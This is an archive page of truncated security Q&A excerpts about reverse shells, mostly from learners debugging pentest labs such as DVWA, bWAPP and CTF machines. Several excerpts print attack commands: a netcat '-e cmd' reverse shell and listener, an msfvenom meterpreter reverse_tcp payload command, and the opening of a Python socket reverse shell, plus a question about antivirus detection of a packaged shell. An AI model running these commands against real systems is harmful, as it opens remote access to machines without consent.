reverse shell – Page 8 – WindowsTechs.com

Why are PHP based msfvenom reverse shells for targeting my Windows server (for penetration testing purpose) not working?

Posted on December 19, 2020 by Shy

I am just getting started with information security and trying to get a taste of it.
I am running Windows 10 in my laptop and have deployed DVWA in it on XAMPP. I am running a virtual machine in the same laptop with OS Kali linux. Before d… Continue reading Why are PHP based msfvenom reverse shells for targeting my Windows server (for penetration testing purpose) not working?→

nc reverse shell not showing the executing of binaries or scripts

Posted on October 26, 2020 by DawnFreeze

Client side (target box)
nc <attacker ip> <port> -e cmd

Attacking side (listener)
nc -lvp <port>

Everything works fine, however when I try to run executables or Powershell scripts, it just echos the name of the binary … Continue reading nc reverse shell not showing the executing of binaries or scripts→

Reverse shell with python client side becomes detectable after converting with pyinstaller as exe file

Posted on October 11, 2020 by SkylerX

When converting the reverse shell client.py python file to exe with pyinstaller it becomes detectable as a trojan on virustotal.com with most antivirus.
Here is my client file:
import os, socket, subprocess

s = socket.socket()
host = ‘192… Continue reading Reverse shell with python client side becomes detectable after converting with pyinstaller as exe file→

Setting up netcat session over the internet [closed]

Posted on September 9, 2020 by cdx

I am a student working on an ethical hacking project.
How do I set a netcat session over the internet? My project requires us to use a public service like AWS or DigitalOcean as the victim machine and my own PC has an attacker machine. I t… Continue reading Setting up netcat session over the internet [closed]→

Reverse shell from behind NAT and Firewall [closed]

Posted on August 5, 2020 by kanishkashowto

I was working on Ganana 1 CTF challenge. To up the challenge, I decided to place this CTF machine behind a router. My entire LAB is on Vmware. For this scenario, I used three virtual machines: Kali, Ipfire and Ganana 1 CTF machine.
Kali Li… Continue reading Reverse shell from behind NAT and Firewall [closed]→

UFW does not block meterpreter

Posted on August 4, 2020 by linux

I am doing some pen testing on my wordpress server. I wanted to see what would happen if the attacker were to get a hold of my username and password for wordpress.
So I used the standard exploit in msfconsole wp_admin_shell_upload and set … Continue reading UFW does not block meterpreter→

Meterpreter Session died [Bwapp]

Posted on July 28, 2020 by hx.m4v

I just set up a lab with bwapp and wanted to jump straight into webshell.
I used Unrestricted file upload vuln –> uploaded my perfect shell created with msfvenom.
My only problem is that my session doesn’t seem persistent as I’m gettin… Continue reading Meterpreter Session died [Bwapp]→

Connect msfvenom reverse shell without metasploit

Posted on July 27, 2020 by TJCLK

For most reverse shell here, I can simply use netcat to connect:
nc -nlvp 1234

But for reverse shell created by msfvenom, for example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx

I CANNOT use netcat to… Continue reading Connect msfvenom reverse shell without metasploit→

Web Shells Using [bwapp] Testing RCE for project [closed]

Posted on July 20, 2020 by hx.m4v

I require a sploit Sensei to teach me the ways of XSS – BWapp for a project.
I just need ref to good video demo-ing a full RCE on Bwapp.
I’m more of an analyst so my pentest skills are futile to say the least but this is for work and I don… Continue reading Web Shells Using [bwapp] Testing RCE for project [closed]→

Access to Reverse Shell from another network

Posted on July 17, 2020 by stack20security

If when we have a reverse shell and get persistence and we try to access the compromised target from another network different from the one which we created the payload, is that access to the compromised target still possible or only from … Continue reading Access to Reverse Shell from another network→